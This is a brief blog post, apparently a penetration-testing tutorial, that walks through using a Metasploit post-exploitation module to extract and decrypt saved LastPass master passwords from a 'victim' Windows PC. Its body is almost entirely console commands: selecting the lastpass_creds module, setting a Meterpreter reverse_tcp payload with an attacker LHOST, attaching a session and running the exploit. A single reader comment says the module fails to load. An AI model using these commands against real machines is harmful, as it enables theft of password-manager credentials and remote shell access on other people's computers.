Categories

Archives

Kali Linux, Penetration Testing

Hack Saved LastPass Master Password in Remote Windows, Linux, MAC PC

This module extracts and decrypts LastPass master login accounts and passwords

Exploit Targets

lastpass

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use post/multi/gather/lastpass_creds

msf exploit (lastpass_creds)>set payload windows/meterpreter/reverse_tcp

msf exploit (lastpass_creds)>set lhost 192.168.1.103 (IP of Local Host)

msf exploit (lastpass_creds)>set session 1

msf exploit (lastpass_creds)>exploit

 

2 thoughts on “Hack Saved LastPass Master Password in Remote Windows, Linux, MAC PC

  1. I get the following error when I try it

    failed to load module: post/multi/gather/lastpass_creds

Comments are closed.